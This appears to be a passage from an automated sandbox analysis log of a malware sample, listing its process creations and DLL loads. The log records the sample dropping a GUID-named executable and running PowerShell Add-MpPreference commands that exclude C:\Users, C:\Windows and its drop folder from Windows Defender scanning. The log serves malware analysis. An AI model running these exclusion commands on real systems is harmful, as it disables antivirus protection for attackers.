Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe "C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe "C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: apphelp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: sspicli.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: wininet.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: rstrtmgr.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: ncrypt.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: ntasn1.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: dbghelp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: iertutil.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: windows.storage.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: wldp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: profapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: kernel.appcore.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: winhttp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: mswsock.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: iphlpapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: winnsi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: urlmon.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: srvcli.dll
